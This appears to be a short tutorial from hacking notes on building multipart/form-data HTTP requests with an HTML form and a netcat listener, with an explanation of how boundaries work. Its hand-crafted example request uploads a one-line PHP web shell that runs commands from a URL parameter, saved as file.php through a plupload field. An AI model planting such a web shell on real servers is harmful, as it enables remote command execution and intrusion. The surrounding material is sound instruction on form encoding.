HTML & netcat
First, create a file with the content of the request:
<form action="http://localhost:8000" method="post" enctype="multipart/form-data">
<p><input type="text" name="nombre" value="jorgesito">
<p><input type="text" name="apellido" value="alvarado">
<p><input type="file" name="avatar">
<p><button type="submit">Submit</button>
</form>
Create the file to upload:
echo "si buenas" > hola.txt
Then, take the port from before and listen in that port:
nc -lvp 8000
Now, open the .html
file in the browser, select the file and submit the request, we will see something like:


Manually create this request
POST / HTTP/1.1
Host: localhost:8000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Length: 323
Content-Type: multipart/form-data; boundary=---divino
-----divino
Content-Disposition: form-data; name="plupload"
1
-----divino
Content-Disposition: form-data; name="name"
file.php
-----divino
Content-Disposition: form-data; name="file"; filename="file.txt"
Content-Type: application/octet-stream
<?php system($_GET["xmd"]); ?>
-----divino--
Let's keep in mind this:
Content-Type: multipart/form-data; boundary=---divino
https://www.w3.org/TR/html401/interact/forms.html#h-17.13.4.2
A boundary is used to differentiate the information traveling across the request, to "divide" and to indicate where is the start and the end of it.
In our example:
In the header, we define the boundary, and it has three dashes (---) next to random info.
In the body request, the boundary is the same, but, we need to append in the start two dashes (required). SO, if our boundary is boundary=ay, our body boundary will be: --ay.
In the last line of our information, the request needs that our boundary contains two dashes (--) in the final. This is to indicate the final boundary info for that part.
Last updated